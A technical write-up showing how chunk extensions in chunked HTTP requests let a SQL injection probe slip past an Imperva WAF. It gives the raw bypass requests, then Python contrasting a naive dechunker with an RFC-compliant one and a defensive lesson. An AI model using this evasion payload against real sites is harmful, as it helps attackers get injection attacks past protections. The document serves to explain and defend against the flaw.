If you send a conventional chunked-transfer request as a bypass attempt, the WAF identifies it directly and blocks it.
Almost all WAFs can recognize a request that uses Transfer-Encoding: chunked, but some do not process the comment that may follow the length identifier of each chunk (the chunk extension after the `;`). As a result, if a comment is added to the packet, the WAF fails to recognize the reassembled payload.
First we send a regular chunked-transfer request to a test website:
POST /xxxxxx.jsp HTTP/1.1
......
Transfer-Encoding: Chunked
9
xxxxxxxxx
9
xx=xxxxxx
9
xxxxxxxxx
1
d
9
&a=1 and
3
2=2
0
The returned results are shown in the following figure.
You can see that our attack payload "and 2=2" was intercepted by Imperva's WAF.
Now we send the same chunked request with a comment added after each chunk length.
POST /xxxxxx.jsp HTTP/1.1
......
Transfer-Encoding: Chunked
9
xxxxxxxxx
9
xx=xxxxxx
9
xxxxxxxxx
1;testsdasdsad
d
9;test
&a=1 and
3;test44444
2=2
0
The returned results are shown in the following figure.
You can see that the firewall no longer intercepts this payload.
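The root cause is a dechunking step on the inspection side that assumes the chunk-size line contains only hex digits. RFC 7230 section 4.1 allows a chunk extension (`;name=value`) after the size, so a parser that rejects or skips such lines loses sight of the body while the origin server still reassembles it. The following Python, added here as an illustration and not taken from the article or from any WAF vendor, contrasts a naive decoder with an RFC-compliant one over a constructed request body modelled on the packets above; the body bytes, the `naive_decode_chunked` / `decode_chunked` function names and the simple tautology rule in `looks_like_tautology` are all assumptions made for this example.

```python
import re

# Constructed chunked bodies, modelled on the article's packets. Both reassemble
# to the same bytes; the second carries chunk extensions after each chunk size.
REQUEST_PLAIN = (
    b"3\r\nid=\r\n"
    b"1\r\n1\r\n"
    b"5\r\n and \r\n"
    b"3\r\n2=2\r\n"
    b"0\r\n\r\n"
)
REQUEST_WITH_EXT = (
    b"3;testsdasdsad\r\nid=\r\n"
    b"1;test\r\n1\r\n"
    b"5;test44444\r\n and \r\n"
    b"3;x=y\r\n2=2\r\n"
    b"0\r\n\r\n"
)

# chunk-size [ chunk-ext ]  (RFC 7230 4.1): hex digits, optionally followed by
# optional whitespace, ';' and the extension text up to the end of the line.
CHUNK_SIZE_LINE = re.compile(rb"^([0-9A-Fa-f]+)(?:[ \t]*;[^\r\n]*)?$")

def _walk_chunks(raw: bytes, parse_size):
    """Shared dechunking loop; parse_size turns a size line into an int."""
    pos, out = 0, bytearray()
    while True:
        end = raw.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("truncated chunk-size line")
        size = parse_size(raw[pos:end])
        pos = end + 2
        if size == 0:
            return bytes(out)            # last-chunk; trailers (if any) ignored
        data = raw[pos:pos + size]
        if len(data) != size or raw[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk data does not match declared size")
        out += data
        pos += size + 2

def naive_decode_chunked(raw: bytes):
    """Decoder that assumes the size line is pure hex. A size line such as
    b'1;test' makes int() raise, and this decoder 'fails open' by returning
    None, so any signature check downstream never sees the body."""
    try:
        return _walk_chunks(raw, lambda line: int(line.decode("ascii"), 16))
    except ValueError:
        return None

def decode_chunked(raw: bytes) -> bytes:
    """RFC-compliant decoder: accepts and discards chunk extensions, so the
    inspection layer reassembles exactly what the origin server will see."""
    def parse_size(line: bytes) -> int:
        m = CHUNK_SIZE_LINE.match(line)
        if not m:
            raise ValueError(f"malformed chunk-size line: {line!r}")
        return int(m.group(1), 16)
    return _walk_chunks(raw, parse_size)

def looks_like_tautology(body: bytes) -> bool:
    """Illustrative rule for the article's payload shape ('and 2=2'); a real
    WAF rule set is far broader, this only shows the check runs on the
    normalized body rather than on the raw chunks."""
    return re.search(rb"\band\s+\d+\s*=\s*\d+", body, re.IGNORECASE) is not None

if __name__ == "__main__":
    for name, raw in (("plain", REQUEST_PLAIN), ("with extensions", REQUEST_WITH_EXT)):
        naive = naive_decode_chunked(raw)
        strict = decode_chunked(raw)
        print(f"{name:16s} naive={naive!r:22s} strict={strict!r} "
              f"flagged={looks_like_tautology(strict)}")
```

Run stand-alone, the naive decoder returns the body for the plain request but `None` for the request with extensions, while the compliant decoder returns `b"id=1 and 2=2"` for both and the rule fires on it. The defensive lesson is that any layer that inspects a chunked body must either implement the full chunk-size grammar or treat a parse failure as a block rather than a pass-through.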